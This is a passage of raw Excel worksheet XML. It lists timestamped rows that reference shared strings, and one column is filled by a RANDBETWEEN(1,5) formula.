        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27355" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27355" s="1">
        <v>42886.386701388888</v>
      </c>
      <c r="C27355" t="s">
        <v>197</v>
      </c>
      <c r="E27355" t="s">
        <v>24886</v>
      </c>
      <c r="F27355">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27356" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27356" s="1">
        <v>42886.365868055553</v>
      </c>
      <c r="C27356" t="s">
        <v>10</v>
      </c>
      <c r="D27356" t="s">
        <v>39</v>
      </c>
      <c r="E27356" s="2" t="s">
        <v>24887</v>
      </c>
      <c r="F27356">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27357" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A27357" s="1">
        <v>42886.320555555554</v>
      </c>
      <c r="C27357" t="s">
        <v>41</v>
      </c>
      <c r="E27357" s="2" t="s">
        <v>24888</v>
      </c>
      <c r="F27357">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27358" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27358" s="1">
        <v>42886.291539351849</v>
      </c>
      <c r="C27358" t="s">
        <v>48</v>
      </c>
      <c r="E27358" t="s">
        <v>24889</v>
      </c>
      <c r="F27358">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27359" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27359" s="1">
        <v>42886.278483796297</v>
      </c>
      <c r="C27359" t="s">
        <v>229</v>
      </c>
      <c r="E27359" t="s">
        <v>24890</v>
      </c>
      <c r="F27359">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27360" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27360" s="1">
        <v>42886.25644675926</v>
      </c>
      <c r="C27360" t="s">
        <v>686</v>
      </c>
      <c r="E27360" t="s">
        <v>24891</v>
      </c>
      <c r="F27360">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27361" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27361" s="1">
        <v>42886.223009259258</v>
      </c>
      <c r="C27361" t="s">
        <v>48</v>
      </c>
      <c r="E27361" s="2" t="s">
        <v>24892</v>
      </c>
      <c r="F27361">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27362" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27362" s="1">
        <v>42886.212546296294</v>
      </c>
      <c r="C27362" t="s">
        <v>1130</v>
      </c>
      <c r="E27362" t="s">
        <v>24893</v>
      </c>
      <c r="F27362">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27363" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27363" s="1">
        <v>42886.134814814817</v>
      </c>
      <c r="C27363" t="s">
        <v>471</v>
      </c>
      <c r="E27363" s="2" t="s">
        <v>24894</v>
      </c>
      <c r="F27363">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27364" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27364" s="1">
        <v>42886.12877314815</v>
      </c>
      <c r="C27364" t="s">
        <v>41</v>
      </c>
      <c r="E27364" s="2" t="s">
        <v>24895</v>
      </c>
      <c r="F27364">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27365" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27365" s="1">
        <v>42886.126307870371</v>
      </c>
      <c r="C27365" t="s">
        <v>41</v>
      </c>
      <c r="F27365">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27366" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27366" s="1">
        <v>42885.972187500003</v>
      </c>
      <c r="C27366" t="s">
        <v>73</v>
      </c>
      <c r="E27366" s="2" t="s">
        <v>24896</v>
      </c>
      <c r="F27366">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27367" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27367" s="1">
        <v>42885.941747685189</v>
      </c>
      <c r="C27367" t="s">
        <v>73</v>
      </c>
      <c r="E27367" t="s">
        <v>24897</v>
      </c>
      <c r="F27367">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27368" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27368" s="1">
        <v>42885.799803240741</v>
      </c>
      <c r="C27368" t="s">
        <v>10</v>
      </c>
      <c r="D27368" t="s">
        <v>11</v>
      </c>
      <c r="E27368" t="s">
        <v>24898</v>
      </c>
      <c r="F27368">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27369" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27369" s="1">
        <v>42885.797430555554</v>
      </c>
      <c r="C27369" t="s">
        <v>140</v>
      </c>
      <c r="D27369" t="s">
        <v>46</v>
      </c>
      <c r="E27369" t="s">
        <v>24899</v>
      </c>
      <c r="F27369">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27370" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27370" s="1">
        <v>42885.796793981484</v>
      </c>
      <c r="C27370" t="s">
        <v>140</v>
      </c>
      <c r="D27370" t="s">
        <v>46</v>
      </c>
      <c r="F27370">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27371" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27371" s="1">
        <v>42885.79614583333</v>
      </c>
      <c r="C27371" t="s">
        <v>140</v>
      </c>
      <c r="D27371" t="s">
        <v>46</v>
      </c>
      <c r="F27371">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27372" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27372" s="1">
        <v>42885.794641203705</v>
      </c>
      <c r="C27372" t="s">
        <v>16</v>
      </c>
      <c r="F27372">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27373" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27373" s="1">
        <v>42885.782743055555</v>
      </c>
      <c r="C27373" t="s">
        <v>10</v>
      </c>
      <c r="D27373" t="s">
        <v>6</v>
      </c>
      <c r="E27373" s="2" t="s">
        <v>24900</v>
      </c>
      <c r="F27373">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27374" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27374" s="1">
        <v>42885.772476851853</v>
      </c>
      <c r="C27374" t="s">
        <v>10</v>
      </c>
      <c r="D27374" t="s">
        <v>374</v>
      </c>
      <c r="E27374" s="2" t="s">
        <v>24901</v>
      </c>
      <c r="F27374">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27375" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27375" s="1">
        <v>42885.748414351852</v>
      </c>
      <c r="C27375" t="s">
        <v>10</v>
      </c>
      <c r="D27375" t="s">
        <v>6</v>
      </c>
      <c r="E27375" t="s">
        <v>24902</v>
      </c>
      <c r="F27375">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27376" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27376" s="1">
        <v>42885.724942129629</v>
      </c>
      <c r="C27376" t="s">
        <v>10</v>
      </c>
      <c r="D27376" t="s">
        <v>6</v>
      </c>
      <c r="E27376" s="2" t="s">
        <v>24903</v>
      </c>
      <c r="F27376">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27377" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27377" s="1">
        <v>42885.71597222222</v>
      </c>
      <c r="C27377" t="s">
        <v>10</v>
      </c>
      <c r="D27377" t="s">
        <v>6</v>
      </c>
      <c r="E27377" t="s">
        <v>24904</v>
      </c>
      <c r="F27377">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27378" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27378" s="1">
        <v>42885.699872685182</v>
      </c>
      <c r="C27378" t="s">
        <v>10</v>
      </c>
      <c r="D27378" t="s">
        <v>36</v>
      </c>
      <c r="E27378" t="s">
        <v>24905</v>
      </c>
      <c r="F27378">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27379" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27379" s="1">
        <v>42885.673252314817</v>
      </c>
      <c r="C27379" t="s">
        <v>10</v>
      </c>
      <c r="D27379" t="s">
        <v>6</v>
      </c>
      <c r="E27379" t="s">
        <v>24906</v>
      </c>
      <c r="F27379">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27380" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A27380" s="1">
        <v>42885.663460648146</v>
      </c>
      <c r="C27380" t="s">
        <v>6</v>
      </c>
      <c r="D27380" t="s">
        <v>194</v>
      </c>
      <c r="E27380" s="2" t="s">
        <v>24907</v>
      </c>
      <c r="F27380">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27381" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27381" s="1">
        <v>42885.629652777781</v>
      </c>
      <c r="C27381" t="s">
        <v>10</v>
      </c>
      <c r="D27381" t="s">
        <v>36</v>
      </c>
      <c r="E27381" t="s">
        <v>24908</v>
      </c>
      <c r="F27381">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27382" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A27382" s="1">
        <v>42885.618645833332</v>
      </c>
      <c r="C27382" t="s">
        <v>10</v>
      </c>
      <c r="D27382" t="s">
        <v>89</v>
      </c>
      <c r="E27382" s="2" t="s">
        <v>24909</v>
      </c>
      <c r="F27382">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27383" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27383" s="1">
        <v>42885.580601851849</v>
      </c>
      <c r="C27383" t="s">
        <v>10</v>
      </c>
      <c r="D27383" t="s">
        <v>632</v>
      </c>
      <c r="E27383" t="s">
        <v>24910</v>
      </c>
      <c r="F27383">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27384" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27384" s="1">
        <v>42885.571620370371</v>
      </c>
      <c r="C27384" t="s">
        <v>50</v>
      </c>
      <c r="F27384">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27385" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27385" s="1">
        <v>42885.570625</v>
      </c>
      <c r="C27385" t="s">
        <v>10</v>
      </c>
      <c r="D27385" t="s">
        <v>381</v>
      </c>
      <c r="E27385" t="s">
        <v>24911</v>
      </c>
      <c r="F27385">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27386" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27386" s="1">
        <v>42885.549745370372</v>
      </c>
      <c r="C27386" t="s">
        <v>10</v>
      </c>
      <c r="D27386" t="s">
        <v>151</v>
      </c>
      <c r="E27386" t="s">
        <v>24912</v>
      </c>
      <c r="F27386">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27387" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27387" s="1">
        <v>42885.533564814818</v>
      </c>
      <c r="C27387" t="s">
        <v>10</v>
      </c>
      <c r="D27387" t="s">
        <v>80</v>
      </c>
      <c r="E27387" t="s">
        <v>24913</v>
      </c>
      <c r="F27387">
        <f t="shared" ca="1" si="427"/>
        <v>3</v>
      </c>
    </row>
    <row r="27388" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27388" s="1">
        <v>42885.513009259259</v>
      </c>
      <c r="C27388" t="s">
        <v>48</v>
      </c>
      <c r="E27388" s="2" t="s">
        <v>24914</v>
      </c>
      <c r="F27388">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27389" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A27389" s="1">
        <v>42885.489166666666</v>
      </c>
      <c r="C27389" t="s">
        <v>10</v>
      </c>
      <c r="D27389" t="s">
        <v>17</v>
      </c>
      <c r="E27389" s="2" t="s">
        <v>24915</v>
      </c>
      <c r="F27389">
        <f t="shared" ca="1" si="427"/>
        <v>4</v>
      </c>
    </row>
    <row r="27390" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A27390" s="1">
        <v>42885.485925925925</v>
      </c>
      <c r="C27390" t="s">
        <v>10</v>
      </c>
      <c r="D27390" t="s">
        <v>80</v>
      </c>
      <c r="E27390" s="2" t="s">
        <v>24916</v>
      </c>
      <c r="F27390">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27391" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27391" s="1">
        <v>42885.485300925924</v>
      </c>
      <c r="C27391" t="s">
        <v>41</v>
      </c>
      <c r="E27391" t="s">
        <v>24917</v>
      </c>
      <c r="F27391">
        <f t="shared" ca="1" si="427"/>
        <v>2</v>
      </c>
    </row>
    <row r="27392" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27392" s="1">
        <v>42885.485081018516</v>
      </c>
      <c r="C27392" t="s">
        <v>73</v>
      </c>
      <c r="E27392" t="s">
        <v>24918</v>
      </c>
      <c r="F27392">
        <f t="shared" ca="1" si="427"/>
        <v>1</v>
      </c>
    </row>
    <row r="27393" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27393" s="1">
        <v>42885.459560185183</v>
      </c>
      <c r="C27393" t="s">
        <v>48</v>
      </c>
      <c r="E27393" t="s">
        <v>24919</v>
      </c>
      <c r="F27393">
        <f t="shared" ca="1" si="427"/>
        <v>5</v>
      </c>
    </row>
    <row r="27394" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27394" s="1">
        <v>42885.456493055557</v>
      </c>
      <c r="C27394" t="s">
        <v>16</v>
      </c>
      <c r="E27394" t="s">
        <v>24920</v>
      </c>
      <c r="F27394">
        <f t="shared" ref="F27394:F27457" ca="1" si="428">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="27395" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27395" s="1">
        <v>42885.453333333331</v>
      </c>
      <c r="C27395" t="s">
        <v>178</v>
      </c>
      <c r="E27395" s="2" t="s">
        <v>24921</v>
      </c>
      <c r="F27395">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27396" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A27396" s="1">
        <v>42885.447199074071</v>
      </c>
      <c r="C27396" t="s">
        <v>71</v>
      </c>
      <c r="E27396" s="2" t="s">
        <v>24922</v>
      </c>
      <c r="F27396">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27397" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A27397" s="1">
        <v>42885.43414351852</v>
      </c>
      <c r="C27397" t="s">
        <v>6</v>
      </c>
      <c r="D27397" t="s">
        <v>25</v>
      </c>
      <c r="E27397" s="2" t="s">
        <v>24923</v>
      </c>
      <c r="F27397">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27398" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27398" s="1">
        <v>42885.428912037038</v>
      </c>
      <c r="C27398" t="s">
        <v>71</v>
      </c>
      <c r="E27398" t="s">
        <v>24924</v>
      </c>
      <c r="F27398">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27399" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27399" s="1">
        <v>42885.425486111111</v>
      </c>
      <c r="C27399" t="s">
        <v>65</v>
      </c>
      <c r="E27399" t="s">
        <v>24925</v>
      </c>
      <c r="F27399">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27400" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27400" s="1">
        <v>42885.38921296296</v>
      </c>
      <c r="C27400" t="s">
        <v>10</v>
      </c>
      <c r="D27400" t="s">
        <v>178</v>
      </c>
      <c r="E27400" s="2" t="s">
        <v>24926</v>
      </c>
      <c r="F27400">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27401" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27401" s="1">
        <v>42885.375555555554</v>
      </c>
      <c r="C27401" t="s">
        <v>10</v>
      </c>
      <c r="D27401" t="s">
        <v>41</v>
      </c>
      <c r="E27401" t="s">
        <v>24927</v>
      </c>
      <c r="F27401">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27402" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27402" s="1">
        <v>42885.372129629628</v>
      </c>
      <c r="C27402" t="s">
        <v>6</v>
      </c>
      <c r="D27402" t="s">
        <v>25</v>
      </c>
      <c r="E27402" t="s">
        <v>24928</v>
      </c>
      <c r="F27402">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27403" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27403" s="1">
        <v>42885.371701388889</v>
      </c>
      <c r="C27403" t="s">
        <v>48</v>
      </c>
      <c r="E27403" t="s">
        <v>24929</v>
      </c>
      <c r="F27403">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27404" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27404" s="1">
        <v>42885.355821759258</v>
      </c>
      <c r="C27404" t="s">
        <v>41</v>
      </c>
      <c r="E27404" t="s">
        <v>24930</v>
      </c>
      <c r="F27404">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27405" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27405" s="1">
        <v>42885.340370370373</v>
      </c>
      <c r="C27405" t="s">
        <v>318</v>
      </c>
      <c r="F27405">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27406" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27406" s="1">
        <v>42885.34034722222</v>
      </c>
      <c r="C27406" t="s">
        <v>318</v>
      </c>
      <c r="F27406">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27407" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27407" s="1">
        <v>42885.315717592595</v>
      </c>
      <c r="C27407" t="s">
        <v>103</v>
      </c>
      <c r="E27407" t="s">
        <v>24931</v>
      </c>
      <c r="F27407">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27408" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27408" s="1">
        <v>42885.308368055557</v>
      </c>
      <c r="C27408" t="s">
        <v>50</v>
      </c>
      <c r="E27408" t="s">
        <v>32</v>
      </c>
      <c r="F27408">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27409" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A27409" s="1">
        <v>42885.295914351853</v>
      </c>
      <c r="C27409" t="s">
        <v>339</v>
      </c>
      <c r="E27409" s="2" t="s">
        <v>24932</v>
      </c>
      <c r="F27409">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27410" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A27410" s="1">
        <v>42885.291712962964</v>
      </c>
      <c r="C27410" t="s">
        <v>48</v>
      </c>
      <c r="E27410" s="2" t="s">
        <v>24933</v>
      </c>
      <c r="F27410">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27411" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27411" s="1">
        <v>42885.28266203704</v>
      </c>
      <c r="C27411" t="s">
        <v>559</v>
      </c>
      <c r="E27411" t="s">
        <v>24934</v>
      </c>
      <c r="F27411">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27412" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27412" s="1">
        <v>42885.269618055558</v>
      </c>
      <c r="C27412" t="s">
        <v>48</v>
      </c>
      <c r="E27412" t="s">
        <v>24935</v>
      </c>
      <c r="F27412">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27413" spans="1:6" ht="375" x14ac:dyDescent="0.25">
      <c r="A27413" s="1">
        <v>42885.244108796294</v>
      </c>
      <c r="C27413" t="s">
        <v>535</v>
      </c>
      <c r="E27413" s="2" t="s">
        <v>24936</v>
      </c>
      <c r="F27413">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27414" s="1">
        <v>42885.225914351853</v>
      </c>
      <c r="C27414" t="s">
        <v>60</v>
      </c>
      <c r="E27414" t="s">
        <v>24937</v>
      </c>
      <c r="F27414">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27415" s="1">
        <v>42885.186828703707</v>
      </c>
      <c r="C27415" t="s">
        <v>48</v>
      </c>
      <c r="E27415" t="s">
        <v>24938</v>
      </c>
      <c r="F27415">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27416" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27416" s="1">
        <v>42885.146099537036</v>
      </c>
      <c r="C27416" t="s">
        <v>559</v>
      </c>
      <c r="E27416" t="s">
        <v>24939</v>
      </c>
      <c r="F27416">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27417" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27417" s="1">
        <v>42885.145821759259</v>
      </c>
      <c r="C27417" t="s">
        <v>41</v>
      </c>
      <c r="E27417" t="s">
        <v>24940</v>
      </c>
      <c r="F27417">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27418" s="1">
        <v>42885.10769675926</v>
      </c>
      <c r="C27418" t="s">
        <v>73</v>
      </c>
      <c r="E27418" t="s">
        <v>24941</v>
      </c>
      <c r="F27418">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27419" s="1">
        <v>42885.076631944445</v>
      </c>
      <c r="C27419" t="s">
        <v>140</v>
      </c>
      <c r="D27419" t="s">
        <v>847</v>
      </c>
      <c r="E27419" t="s">
        <v>24942</v>
      </c>
      <c r="F27419">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27420" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27420" s="1">
        <v>42885.010497685187</v>
      </c>
      <c r="C27420" t="s">
        <v>140</v>
      </c>
      <c r="D27420" t="s">
        <v>141</v>
      </c>
      <c r="E27420" t="s">
        <v>24943</v>
      </c>
      <c r="F27420">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27421" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A27421" s="1">
        <v>42884.912060185183</v>
      </c>
      <c r="C27421" t="s">
        <v>140</v>
      </c>
      <c r="D27421" t="s">
        <v>847</v>
      </c>
      <c r="E27421" s="2" t="s">
        <v>24944</v>
      </c>
      <c r="F27421">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27422" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27422" s="1">
        <v>42884.887175925927</v>
      </c>
      <c r="C27422" t="s">
        <v>229</v>
      </c>
      <c r="E27422" t="s">
        <v>24945</v>
      </c>
      <c r="F27422">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27423" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27423" s="1">
        <v>42884.874502314815</v>
      </c>
      <c r="C27423" t="s">
        <v>140</v>
      </c>
      <c r="D27423" t="s">
        <v>234</v>
      </c>
      <c r="E27423" s="2" t="s">
        <v>24946</v>
      </c>
      <c r="F27423">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27424" s="1">
        <v>42884.703622685185</v>
      </c>
      <c r="C27424" t="s">
        <v>260</v>
      </c>
      <c r="E27424" t="s">
        <v>24947</v>
      </c>
      <c r="F27424">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27425" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27425" s="1">
        <v>42884.687002314815</v>
      </c>
      <c r="C27425" t="s">
        <v>845</v>
      </c>
      <c r="E27425" t="s">
        <v>24948</v>
      </c>
      <c r="F27425">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27426" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A27426" s="1">
        <v>42884.65016203704</v>
      </c>
      <c r="C27426" t="s">
        <v>10</v>
      </c>
      <c r="D27426" t="s">
        <v>6</v>
      </c>
      <c r="E27426" s="2" t="s">
        <v>24949</v>
      </c>
      <c r="F27426">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27427" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27427" s="1">
        <v>42884.646817129629</v>
      </c>
      <c r="C27427" t="s">
        <v>4970</v>
      </c>
      <c r="E27427" s="2" t="s">
        <v>24950</v>
      </c>
      <c r="F27427">
        <f t="shared" ca="1" si="428"/>
        <v>4</v>
      </c>
    </row>
    <row r="27428" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27428" s="1">
        <v>42884.613923611112</v>
      </c>
      <c r="C27428" t="s">
        <v>253</v>
      </c>
      <c r="E27428" t="s">
        <v>24951</v>
      </c>
      <c r="F27428">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27429" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27429" s="1">
        <v>42884.558206018519</v>
      </c>
      <c r="C27429" t="s">
        <v>41</v>
      </c>
      <c r="E27429" t="s">
        <v>24952</v>
      </c>
      <c r="F27429">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27430" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27430" s="1">
        <v>42884.457060185188</v>
      </c>
      <c r="C27430" t="s">
        <v>10</v>
      </c>
      <c r="D27430" t="s">
        <v>89</v>
      </c>
      <c r="E27430" t="s">
        <v>24953</v>
      </c>
      <c r="F27430">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27431" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A27431" s="1">
        <v>42884.439270833333</v>
      </c>
      <c r="C27431" t="s">
        <v>16</v>
      </c>
      <c r="E27431" s="2" t="s">
        <v>24954</v>
      </c>
      <c r="F27431">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27432" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A27432" s="1">
        <v>42884.408796296295</v>
      </c>
      <c r="C27432" t="s">
        <v>50</v>
      </c>
      <c r="E27432" s="2" t="s">
        <v>24955</v>
      </c>
      <c r="F27432">
        <f t="shared" ca="1" si="428"/>
        <v>3</v>
      </c>
    </row>
    <row r="27433" spans="1:6" ht="315" x14ac:dyDescent="0.25">
      <c r="A27433" s="1">
        <v>42884.381331018521</v>
      </c>
      <c r="C27433" t="s">
        <v>461</v>
      </c>
      <c r="E27433" s="2" t="s">
        <v>24956</v>
      </c>
      <c r="F27433">
        <f t="shared" ca="1" si="428"/>
        <v>2</v>
      </c>
    </row>
    <row r="27434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27434" s="1">
        <v>42884.37054398148</v>
      </c>
      <c r="C27434" t="s">
        <v>41</v>
      </c>
      <c r="E27434" t="s">
        <v>24957</v>
      </c>
      <c r="F27434">
        <f t="shared" ca="1" si="428"/>
        <v>1</v>
      </c>
    </row>
    <row r="27435" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A27435" s="1">
        <v>42884.334629629629</v>
      </c>
      <c r="C27435" t="s">
        <v>749</v>
      </c>
      <c r="E27435" s="2" t="s">
        <v>24958</v>
      </c>
      <c r="F27435">
        <f t="shared" ca="1" si="428"/>
        <v>5</v>
      </c>
    </row>
    <row r="27436" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A27436" s="1">
        <v>42884.328159722223</v>
      </c>
      <c r="C27436" t="s">
        <v>69</v>
      </c>
      <c r="E27436" t="s">
        <v>24959</v>
      </c>
      <c r="F27436">
        <f t="shared" ca="1" si="428"/>
